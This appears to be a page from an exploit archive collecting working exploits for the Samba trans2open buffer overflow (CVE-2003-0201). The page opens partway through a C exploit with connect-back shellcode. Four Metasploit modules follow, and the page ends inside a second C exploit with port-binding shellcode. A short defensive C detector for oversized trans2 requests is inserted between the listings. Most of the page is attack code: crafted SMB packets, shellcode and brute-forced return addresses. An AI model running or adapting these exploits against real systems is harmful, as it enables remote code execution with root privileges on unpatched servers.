      bsd_connect_back[169]= (a_port >> 8) & 0xff;

      switch(typeos) {
      case 0:
              desc = "Linux";
              ret = 0xc0000000;
              shellcode = linux_connect_back;
              break;
      case 1:
              desc = "FreeBSD/NetBSD";
              ret = 0xbfc00000;
              shellcode = bsd_connect_back;
              break;
      case 2:
              desc = "OpenBSD 3.1 and prior";
              ret = 0xdfc00000;
              shellcode = bsd_connect_back;
              break;
      case 3:
              desc = "OpenBSD 3.2 non-exec stack";
              ret = 0x00170000;
              shellcode = bsd_connect_back;
              break;
      }

      fprintf(stdout, "[+] Target: %s\n", desc);
      memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

      addr1.sin_family = AF_INET;
      addr1.sin_port	 = htons(port);	

      fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);
      fprintf(stdout, "[+] Please wait in seconds...!\n");

      signal(SIGUSR2, GoAway);
   
      for (i = 0; i < 50; i++) childs[i] = -1;
      i = 0; m = 0;

      while (LOOP) {

           if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
              fprintf(stderr, "[+] socket() error.\n");
              exit(-1);
           }

           ret -= STEPS; i++;
           if ((ret & 0xff) == 0x00 && typeos != 3) ret++;             

           m++; 
           //fflush(0);
           //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m);

           usleep(150000);

           switch (childs[i] = fork()) {
           case 0:  
                  if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) {
                      //fprintf(stderr, "[+] connect() error.\n");
                      close(sock);
                      exit(-1);
                  }
			
                 start_session(sock);
                 sleep(3);
		     		         
                 if (typeos != 3) {
                           if (exploit_normal(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                 } else {
                           if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                  }
                  sleep(5);
                  close(sock);
                  exit(0);
                  break;
           case -1:
                  exit(-1);
                  break;
           default:
                  if (i > MAX_CHILDS - 2) {
                      wait(&status);
                      i--;
                  }
                  break;
           } 

           if (m == ENDLOOP) LOOP = 0;
      } 	   

      if (stat(".ROOT", &st) != -1) 
         kill(SIGUSR2, listen_pid);
      else {	
           fprintf(stdout, "[+] Dohh, exploit failed.\n");
	   close(client); close(sock_listen);
           kill(listen_pid, SIGUSR2);
	   sleep(2);
	   exit(0);
      }
}

// milw0rm.com [2003-07-13]
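As an added defender-side example, not part of any listing on this page, the C below decodes the NetBIOS session and SMB headers that the exploits above build (the NETBIOS_HEADER / SMB_HEADER layouts, command 0x32 for SMBtrans2, uid 100) and flags trans2 requests whose body exceeds the 1024-byte pstring limit or whose declared NetBIOS length disagrees with the bytes actually received. The function names parse_smb_request, check_trans2_request and build_sample are my own, and the sample messages are constructed filler rather than any exploit's payload.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Values taken from the listings above: the SMBtrans2 command byte and the
 * 1024-byte pstring that call_trans2open() copies the pathname into. */
#define SMB_COM_TRANSACTION2 0x32
#define SAMBA_PSTRING_SIZE   1024

#define NB_HDR_LEN  4    /* NetBIOS session header: type, flags, 16-bit length */
#define SMB_HDR_LEN 32   /* 0xFF 'S' 'M' 'B' ... through MID */

typedef struct {
    uint8_t  nb_type;      /* 0x00 = session message */
    uint16_t nb_length;    /* payload length declared by the NetBIOS header */
    uint8_t  command;      /* SMB command byte */
    uint16_t tid, pid, uid, mid;
    size_t   body_len;     /* bytes actually present after the SMB header */
} smb_request;

/* Decode both headers from a raw session message. Returns 0 on success, -1 if
 * the buffer is too short or is not an SMB session message. */
int parse_smb_request(const uint8_t *buf, size_t len, smb_request *out)
{
    if (buf == NULL || out == NULL || len < NB_HDR_LEN + SMB_HDR_LEN) return -1;
    out->nb_type   = buf[0];
    out->nb_length = (uint16_t)((buf[2] << 8) | buf[3]);      /* big-endian */
    if (out->nb_type != 0x00) return -1;

    const uint8_t *smb = buf + NB_HDR_LEN;
    if (smb[0] != 0xFF || memcmp(smb + 1, "SMB", 3) != 0) return -1;
    out->command = smb[4];
    /* SMB header words are little-endian on the wire; the exploits above store
     * them as host shorts, which only matches the wire format on x86. */
    out->tid = (uint16_t)(smb[24] | (smb[25] << 8));
    out->pid = (uint16_t)(smb[26] | (smb[27] << 8));
    out->uid = (uint16_t)(smb[28] | (smb[29] << 8));
    out->mid = (uint16_t)(smb[30] | (smb[31] << 8));
    out->body_len = len - NB_HDR_LEN - SMB_HDR_LEN;
    return 0;
}

/* Findings are a bitmask so one message can raise several at once. */
enum {
    FINDING_LENGTH_MISMATCH  = 1,  /* declared NetBIOS length != bytes received */
    FINDING_TRANS2_OVERSIZED = 2   /* trans2 body larger than body_threshold */
};

/* Heuristic check. Returns -1 for non-SMB input, otherwise a findings bitmask.
 * body_threshold is tunable; SAMBA_PSTRING_SIZE mirrors the advisory's limit. */
int check_trans2_request(const uint8_t *buf, size_t len, size_t body_threshold)
{
    smb_request r;
    int findings = 0;
    if (parse_smb_request(buf, len, &r) != 0) return -1;
    if ((size_t)r.nb_length != len - NB_HDR_LEN) findings |= FINDING_LENGTH_MISMATCH;
    if (r.command == SMB_COM_TRANSACTION2 && r.body_len > body_threshold)
        findings |= FINDING_TRANS2_OVERSIZED;
    return findings;
}

/* Build a constructed session message for testing (headers plus filler, not
 * any exploit's payload). Returns the total length, or 0 if cap is too small. */
size_t build_sample(uint8_t *out, size_t cap, uint8_t command,
                    uint16_t declared_len, size_t body_len, uint8_t fill)
{
    size_t total = NB_HDR_LEN + SMB_HDR_LEN + body_len;
    if (total > cap) return 0;
    memset(out, 0, total);
    out[0] = 0x00;                            /* session message */
    out[2] = (uint8_t)(declared_len >> 8);
    out[3] = (uint8_t)(declared_len & 0xff);
    out[4] = 0xFF; out[5] = 'S'; out[6] = 'M'; out[7] = 'B';
    out[8] = command;
    out[NB_HDR_LEN + 28] = 100;               /* uid = 100, as in the listings */
    memset(out + NB_HDR_LEN + SMB_HDR_LEN, fill, body_len);
    return total;
}

int main(void)
{
    static uint8_t msg[4096];
    /* A 50-byte session setup (0x73) like start_session() sends: no findings. */
    size_t n = build_sample(msg, sizeof msg, 0x73, 0x2E, 14, 0x00);
    printf("session setup : findings=%d\n", check_trans2_request(msg, n, SAMBA_PSTRING_SIZE));
    /* A trans2 request whose body is far beyond what a pstring can hold. */
    n = build_sample(msg, sizeof msg, SMB_COM_TRANSACTION2, (uint16_t)(SMB_HDR_LEN + 2060), 2060, 'A');
    printf("large trans2  : findings=%d\n", check_trans2_request(msg, n, SAMBA_PSTRING_SIZE));
    return 0;
}
```

The 1024-byte threshold is coarse: legitimate trans2 requests carrying large data blocks will also trip it, so treat a hit as a triage candidate rather than a confirmed exploit attempt.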
		

- Vulnerability information (16330)

Samba trans2open Overflow (Solaris SPARC) (EDBID:16330)
solaris/sparc remote
2010-06-21 Verified
0 metasploit
N/A [download]
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Solaris SPARC)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on Solaris SPARC systems that do not
				have the noexec stack option set. Big thanks to MC and
				valsmith for resolving a problem with the beta version of
				this module.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9571 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'solaris',
			'Targets'        =>
				[
					[ 'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
						{
							'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack
							'Offset'       => 1103,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xffbffaf0 },
									'Stop'  => { 'Ret' => 0xffbfa000 },
									'Step'  => 128
								}
						}
					],

					[ 'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
						{
							'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack
							'Offset'       => 1103,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xffbefaf0 },
									'Stop'  => { 'Ret' => 0xffbea000 },
									'Step'  => 128
								}
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			#
			# The obstacle course:
			# 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
			# 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
			# 	return(outsize);
			#

			# This value *must* be 1988 to allow findrecv shellcode to work
			pattern = rand_text_english(1988)

			#
			# This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
			#
			# Patch the overwritten heap pointers
			# substr($pattern, 1159, 4, pack('N', $target->[4]));
			# substr($pattern, 1163, 4, pack('N', $target->[4]));
			#
			# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
			# substr($pattern, 1195, 4, pack('N', 0xffffffff));
			#
			# Fix the frame pointer (need to check for null in address)
			# substr($pattern, 1243, 4, pack('N', $target->[3]-64));
			#
			# Finally set the return address
			# substr($pattern, 1247, 4, pack('N', $curr_ret));
			#

			#
			# This method is more reliable against a wider range of targets
			#

			off = target['Offset']
			ptr_to_non_zero = target['PtrToNonZero']

			# Local variable pointer patches for early versions of 2.2.x
			pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
			off += 36

			# Overwrite heap pointers with a ptr to NULL at the top of the stack
			pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
			off += 40

			# Patch the type index into the smb_messages[] array...
			# >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
			pattern[off, 20] = [0xffffffff].pack('N') * 5
			off += 20

			# This stream covers the framepointer and the return address
			pattern[off, 400] = [curr_ret].pack('N') * 100

			# Stuff the shellcode into the request
			pattern[3, payload.encoded.length] = payload.encoded

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			sock.put(trans)
			handler
			disconnect

		rescue EOFError
		rescue => e
			print_error("#{e}")
		end

	end

end

- Vulnerability information (16861)

Samba trans2open Overflow (Linux x86) (EDBID:16861)
linux remote
2010-07-14 Verified
0 metasploit
##
# $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Linux x86)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on x86 Linux systems that do not
				have the noexec stack option set.

				NOTE: Some older versions of RedHat do not seem to be vulnerable
				since they apparently do not allow anonymous access to IPC.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9828 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'linux',
			'Targets'        =>
				[
					# tested OK - jjd:
					# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
					# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
					[ 'Samba 2.2.x - Bruteforce',
						{
							'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
							'Offset'       => 1055,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xbffffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 256
								}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			if ! @checked_peerlm
				if smb_peer_lm !~ /samba/i
					raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm})"
				end

				if smb_peer_lm =~ /Samba [34]\./i
					raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
				end
			end

			@checked_peerlm = true


			# This value *must* be 1988 to allow findrecv shellcode to work
			# XXX: I'm not sure the above comment is true...
			pattern = rand_text_english(1988)

			# See the OSX and Solaris versions of this module for additional
			# information.

			# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
			# (rpmbuild -bp ; edited/reran config.status ; make)
			eip_off = target['Offset']
			ptr_to_non_zero = target['PtrToNonZero']

			# Stuff the shellcode into the request
			pattern[0, payload.encoded.length] = payload.encoded

			# We want test true here, so we overwrite conn with a pointer
			# to something non-zero.
			#
			# 222       if (IS_IPC(conn)) {
			# 223          return(ERROR(ERRSRV,ERRaccess));
			# 224       }
			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')

			# We want to avoid crashing on the following two dereferences.
			#
			# 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
			# 117     {
			# 118       int outsize = set_message(outbuf,0,0,True);
			# 119       int cmd = CVAL(inbuf,smb_com);
			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')

			# This stream covers the framepointer and the return address
			#pattern[1199, 400] = [curr_ret].pack('N') * 100
			pattern[eip_off, 4] = [curr_ret].pack('V')

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			# puts "press any key"; $stdin.gets

			sock.put(trans)
			handler

		rescue ::EOFError
		rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
			raise $!
		rescue ::Exception => e
			print_error("#{rhost} #{e}")
		end

		handler
		disconnect

	end

end


- Vulnerability information (16876)

Samba trans2open Overflow (Mac OS X PPC) (EDBID:16876)
os-x/ppc remote
2010-06-21 Verified
0 metasploit
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Mac OS X PPC)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'Version'        => '$Revision: 9571 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        =>
				[
					[ 'Samba 2.2.x - Bruteforce',
						{
							# Not necessary on PPC
							# 'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
							'Offset'       => 1195,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xbffffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 512
								}
						}
					]
				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	# Need to perform target detection
	def autofilter
		false
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			# 1988 is required for findrecv shellcode
			pattern = rand_text_english(1988)

			# This stream covers the framepointer and the return address
			off = target['Offset']
			pattern[off, 64] = [curr_ret].pack('N') * 16

			# Stuff the shellcode into the request
			pattern[3, payload.encoded.length] = payload.encoded

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			sock.put(trans)
			handler
			disconnect

		rescue EOFError
		rescue => e
			print_error("#{e}")
		end

	end

end

- Vulnerability information (16880)

Samba trans2open Overflow (*BSD x86) (EDBID:16880)
linux remote
2010-06-17 Verified
0 metasploit
##
# $Id: trans2open.rb 9552 2010-06-17 22:11:43Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::SMB
	include Msf::Exploit::Brute

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (*BSD x86)',
			'Description'    => %q{
					This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on x86 Linux systems that do not
				have the noexec stack option set.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9552 $',
			'References'     =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294' ],
					[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'bsd',
			'Targets'        =>
				[
					# tested OK - jjd:
					# FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
					[ 'Samba 2.2.x - Bruteforce',
						{
							'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
							'Offset'       => 1055,
							'Bruteforce'   =>
								{
									'Start' => { 'Ret' => 0xbfbffdfc },
									'Stop'  => { 'Ret' => 0xbfa00000 },
									'Step'  => 256
								}
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Apr 7 2003'
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def brute_exploit(addrs)

		curr_ret = addrs['Ret']
		begin
			print_status("Trying return address 0x%.8x..." %  curr_ret)

			connect
			smb_login

			# This value *must* be 1988 to allow findrecv shellcode to work
			# XXX: I'm not sure the above comment is true...
			pattern = rand_text_english(1988)

			# See the OSX and Solaris versions of this module for additional
			# information.

			# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
			# (rpmbuild -bp ; edited/reran config.status ; make)
			eip_off = target['Offset']
			ptr_to_non_zero = target['PtrToNonZero']

			# Stuff the shellcode into the request
			pattern[0, payload.encoded.length] = payload.encoded

			# We want test true here, so we overwrite conn with a pointer
			# to something non-zero.
			#
			# 222       if (IS_IPC(conn)) {
			# 223          return(ERROR(ERRSRV,ERRaccess));
			# 224       }
			pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')

			# We want to avoid crashing on the following two dereferences.
			#
			# 116     int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
			# 117     {
			# 118       int outsize = set_message(outbuf,0,0,True);
			# 119       int cmd = CVAL(inbuf,smb_com);
			pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
			pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')

			# This stream covers the framepointer and the return address
			#pattern[1199, 400] = [curr_ret].pack('N') * 100
			pattern[eip_off, 4] = [curr_ret].pack('V')

			trans =
				"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
				"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
				"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
				pattern

			# puts "press any key"; $stdin.gets

			sock.put(trans)
			handler
			disconnect

		rescue EOFError
		rescue => e
			print_error("#{e}")
		end

	end

end

- Vulnerability information (22468)

Samba 2.2.x 'call_trans2open' Remote Buffer Overflow Vulnerability (1) (EDBID:22468)
unix remote
2003-04-11 Verified
0 Xpl017Elz
source: http://www.securityfocus.com/bid/7294/info

A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.

Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.

It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. 

/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
**                                                                  11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
**
** -- 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** source/smbd/trans2.c:
**
** line:205  static int call_trans2open(connection_struct *conn, char *inbuf, char *outbuf, int bufsize,
** line:206                          char **pparams, int total_params, char **ppdata, int total_data)
** line:207  {
**           [...]
** line:219          char *pname;
** line:220          int16 namelen;
**           [...]
** line:222          pstring fname; // source/include/smb.h:
**                                  // line:162  #define PSTRING_LEN 1024
**                                  // line:165  typedef char pstring[PSTRING_LEN];
**           [...]
** line:250          namelen = strlen(pname)+1;
** line:251
** line:252          StrnCpy(fname,pname,namelen); // here.
**
** reply_trans2() function:
**
** line:3173 int reply_trans2(connection_struct *conn, char *inbuf,char *outbuf,int length,int bufsize)
**           [...]
** line:3358                 outsize = call_trans2open(conn, inbuf, outbuf, bufsize,
** line:3359                                 &params, total_params, &data, total_data);
** line:3360                 END_PROFILE_NESTED(Trans2_open);
** line:3361                 break;
**
** The visible point where this program's control flow changes
** comes after the variables have been overwritten.
**
** For detailed information, refer to Digital Defense's advisory.
**
** http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
**
** Thanks also to eSDee's exploit, which reminded me of the Samba application's communication method.
** --
** Thank you.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>

struct os {
	int num;
	char *ost;
	u_long shell;
};
struct os plat[]=
{
	{
		0,"FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x",
		/*
		   v2.2.0 exploited successfully. (Brute-Force mode)
		   v2.2.1a exploited successfully. (Brute-Force mode)
		   v2.2.2 exploited successfully. (Brute-Force mode)
		   v2.2.3 exploited successfully. (Default mode)
		   v2.2.4 exploited successfully. (Default mode)
		   v2.2.5 exploited successfully. (Default mode)
		   v2.2.6 exploited successfully. (Default mode)
		   v2.2.7 exploited successfully. (Default mode)
		   v2.2.8 exploited successfully. (Default mode)
		*/
		0xbfbff482
	},
	{
		1,"OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x",
		/*
		   v2.2.0 exploited successfully. (Brute-Force mode)
		   v2.2.1a exploited successfully. (Brute-Force mode)
		   v2.2.2 exploited successfully. (Brute-Force mode)
		   v2.2.3 exploited successfully. (Default mode)
		   v2.2.4 exploited successfully. (Default mode)
		   v2.2.5 exploited successfully. (Default mode)
		   v2.2.6 exploited successfully. (Default mode)
		   v2.2.7 exploited successfully. (Default mode)
		   v2.2.8 exploited successfully. (Default mode)
		*/
		0xdfbfd482
	},
	{
		2,NULL,0
	}
};

char shellcode[]=
	/* 86bytes portbinding shellcode by bighawk */
	"\x31\xc9"              // xor ecx, ecx
	"\xf7\xe1"              // mul ecx
	"\x51"                  // push ecx
	"\x41"                  // inc ecx
	"\x51"                  // push ecx
	"\x41"                  // inc ecx
	"\x51"                  // push ecx
	"\x51"                  // push ecx
	"\xb0\x61"              // mov al, 97
	"\xcd\x80"              // int 80h
	"\x89\xc3"              // mov ebx, eax
	"\x52"                  // push edx
	"\x66\x68\x27\x10"      // push word 4135
	"\x66\x51"              // push cx
	"\x89\xe6"              // mov esi, esp
	"\xb1\x10"              // mov cl, 16
	"\x51"                  // push ecx
	"\x56"                  // push esi
	"\x50"                  // push eax
	"\x50"                  // push eax
	"\xb0\x68"              // mov al, 104
	"\xcd\x80"              // int 80h
	"\x51"                  // push ecx
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xb0\x6a"              // mov al, 106
	"\xcd\x80"              // int 80h
	"\x52"                  // push edx
	"\x52"                  // push edx
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xb0\x1e"              // mov al, 30
	"\xcd\x80"              // int 80h
	"\xb1\x03"              // mov cl, 3
	"\x89\xc3"              // mov ebx, eax
	"\xb0\x5a"              // mov al, 90
	"\x49"                  // dec ecx
	"\x51"                  // push ecx
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xcd\x80"              // int 80h
	"\x41"                  // inc ecx
	"\xe2\xf5"              // loop-10
	"\x51"                  // push ecx
	"\x68\x2f\x2f\x73\x68"  // push dword 68732f2fh
	"\x68\x2f\x62\x69\x6e"  // push dword 6e69622fh
	"\x89\xe3"              // mov  ebx, esp
	"\x51"                  // push ecx
	"\x54"                  // push esp
	"\x53"                  // push ebx
	"\x53"                  // push ebx
	"\xb0\x3b"              // mov al, 59
	"\xcd\x80";             // int  80h

#define BRUTE_AT (64)
#define SH_PORT (10000)
#define ATK_PORT (139)
#define DF_NOP (0x41)
#define __BUF_LEN (0x00000463)
#define __LEN_PAD (0x0000012c)

void banrl();
int re_connt(int sock,int type);
void usage(char *p_name);
int setsock(char *host,int port);
void send_recv_sh(int sock);
int __atk_code_send_recv(int sock,u_long shell);

int __atk_code_send_recv(int sock,u_long shell)
{
	int eat_buf_set=0,atk_buf_pos=0;
	char atk_buf[0x960+5];
	char its_exploit_packet[]={
		0x00,0x04,0x09,0x60,0xff,0x53,0x4d,0x42,
		0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
		0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
		0x64,0x00,0x00,0x00,0x00,0xd0,0x07,0x0c,
